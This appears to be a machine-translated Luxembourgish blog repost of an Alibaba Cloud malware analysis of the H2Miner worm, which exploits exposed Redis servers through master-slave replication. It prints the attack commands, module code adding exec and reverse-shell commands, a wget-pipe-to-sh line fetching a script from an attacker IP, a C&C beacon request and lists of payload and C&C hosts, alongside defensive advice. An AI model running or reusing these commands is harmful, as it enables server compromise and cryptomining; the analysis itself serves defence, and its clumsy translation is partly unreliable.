Virun engem Dag gouf ee vun de Servere vu mengem Projet vun engem ähnleche Wuerm attackéiert. Op der Sich no enger Äntwert op d'Fro "Wat war dat?" Ech hunn e super Artikel vum Alibaba Cloud Security Team fonnt. Well ech dësen Artikel op Habré net fonnt hunn, hunn ech decidéiert en speziell fir Iech ze iwwersetzen <3
Element
Viru kuerzem huet d'Sécherheetsteam vun Alibaba Cloud e plötzlechen Ausbroch vum H2Miner entdeckt. Dës Zort vu béiswëlleg Wuerm benotzt de Mangel un Autorisatioun oder schwaache Passwierder fir Redis als Paarte fir Är Systemer, duerno synchroniséiert se säin eegene béisaarteg Modul mam Sklave duerch Master-Sklave-Synchroniséierung a schlussendlech downloadt dëse béisaarteg Modul op déi attackéiert Maschinn a féiert béiswëlleg aus. Uweisungen.
An der Vergaangenheet goufen Attacken op Är Systemer haaptsächlech duerchgefouert mat enger Method mat geplangten Aufgaben oder SSH Schlësselen, déi op Är Maschinn geschriwwe goufen nodeems den Ugräifer op Redis ageloggt ass. Glécklecherweis kann dës Method net dacks benotzt ginn wéinst Probleemer mat der Erlaabneskontrolle oder wéinst verschiddene Systemversioune. Wéi och ëmmer, dës Method fir e béiswëlleg Modul ze lueden kann direkt d'Befehle vum Ugräifer ausféieren oder Zougang zu der Shell kréien, wat geféierlech ass fir Äre System.
Wéinst der grousser Zuel vu Redis Serveren, déi um Internet gehost ginn (bal 1 Millioun), recommandéiert d'Sécherheetsteam vun Alibaba Cloud, als frëndlech Erënnerung, datt d'Benotzer Redis net online deelen a regelméisseg d'Stäerkt vun hire Passwierder kontrolléieren an ob se kompromittéiert sinn. séier Auswiel.
H2 Miner
H2Miner ass e Mining-Botnet fir Linux-baséiert Systemer, déi Äre System op verschidde Manéiere kënnen invadéieren, dorënner de Mangel un Autorisatioun an Hadoop Garn, Docker, a Redis Remote Command Execution (RCE) Schwachstelle. E Botnet funktionnéiert andeems Dir béiswëlleg Scripten a Malware erofluet fir Är Donnéeën ze minen, den Attack horizontal auszebauen, a Kommando a Kontroll (C&C) Kommunikatiounen z'erhalen.
Redis RCE
Wëssen iwwer dëst Thema gouf vum Pavel Toporkov bei ZeroNights gedeelt 2018. No der Versioun 4.0 ënnerstëtzt Redis eng Plug-in Luede Feature, déi d'Benotzer d'Fäegkeet gëtt ze lueden, sou datt Dateie mat C an Redis kompiléiert sinn fir spezifesch Redis Kommandoen auszeféieren. Dës Funktioun, och wann et nëtzlech ass, enthält eng Schwachstelle an där, am Master-Sklave Modus, Dateie kënne mam Sklave iwwer Fullresync Modus synchroniséiert ginn. Dëst kann vun engem Ugräifer benotzt ginn fir béiswëlleg Dateien ze transferéieren. Nodeems den Transfer ofgeschloss ass, lueden d'Ugräifer de Modul op déi attackéiert Redis Instanz an maachen all Kommando aus.
Malware Worm Analyse
Viru kuerzem huet d'Alibaba Cloud Sécherheetsteam entdeckt datt d'Gréisst vun der H2Miner béiswëlleg Miner Grupp op eemol dramatesch eropgaang ass. No der Analyse ass den allgemenge Prozess vun der Attacke wéi follegt:
H2Miner benotzt RCE Redis fir eng voll-vollwäerteg Attack. Ugräifer attackéieren éischt ongeschützt Redis Server oder Server mat schwaache Passwierder.
Da benotzen se de Kommando config set dbfilename red2.so fir den Dateinumm z'änneren. Duerno féieren d'Ugräifer de Kommando aus slaveof fir d'Master-Sklave Replikatiounshost Adress ze setzen.
Wann déi attackéiert Redis Instanz eng Master-Sklave Verbindung mat der béiswëlleger Redis etabléiert, déi vum Ugräifer gehéiert, schéckt den Ugräifer den infizéierte Modul mam Fullresync Kommando fir d'Dateien ze synchroniséieren. D'red2.so Datei gëtt dann op déi attackéiert Maschinn erofgelueden. D'Ugräifer benotzen dann den ./red2.so Luede Modul fir dës sou Datei ze lueden. De Modul kann Kommandoen vun engem Ugräifer ausféieren oder eng ëmgedréint Verbindung (Backdoor) initiéieren fir Zougang zu der attackéierter Maschinn ze kréien.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Nodeems Dir e béiswëlleg Kommando ausféiert wéi z / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, wäert den Ugräifer den Numm vum Backupdatei zrécksetzen an de Systemmodul entluede fir d'Spure ze botzen. Allerdéngs bleift d'red2.so Datei nach ëmmer op der attackéierter Maschinn. D'Benotzer ginn ugeroden op d'Präsenz vun esou engem verdächtege Fichier am Dossier vun hirer Redis Instanz opmierksam ze maachen.
Zousätzlech fir e puer béiswëlleg Prozesser ëmzebréngen fir Ressourcen ze klauen, huet den Ugräifer e béiswëlleg Skript gefollegt andeems se béiswëlleg binär Dateien eroflueden an ausféieren. . Dëst bedeit datt de Prozessnumm oder den Numm vum Verzeichnis, dee Kinsing um Host enthält, kann uginn datt dës Maschinn vun dësem Virus infizéiert ass.
Geméiss de Reverse Engineering Resultater mécht d'Malware haaptsächlech déi folgend Funktiounen aus:
- Eroplueden Dateien an ausféieren
- Biergbau
- C&C Kommunikatioun erhalen an Ugräifer Kommandoen ausféieren
Benotzt Masscan fir extern Scannen fir Ären Afloss auszebauen. Zousätzlech ass d'IP Adress vum C&C Server am Programm haart kodéiert, an den attackéierten Host kommunizéiert mam C&C Kommunikatiounsserver mat HTTP-Ufroen, wou d'Zombie (kompromësséiert Server) Informatioun am HTTP-Header identifizéiert gëtt.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Aner Attack Methoden
Adressen a Linken déi vum Wuerm benotzt ginn
/eng
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tip
Éischtens, Redis soll net vum Internet zougänglech sinn a soll mat engem staarke Passwuert geschützt ginn. Et ass och wichteg datt d'Clientë kontrolléieren datt et keng red2.so Datei am Redis Verzeechnes ass an datt et kee "kinsing" am Datei / Prozessnumm um Host ass.
Source: will.com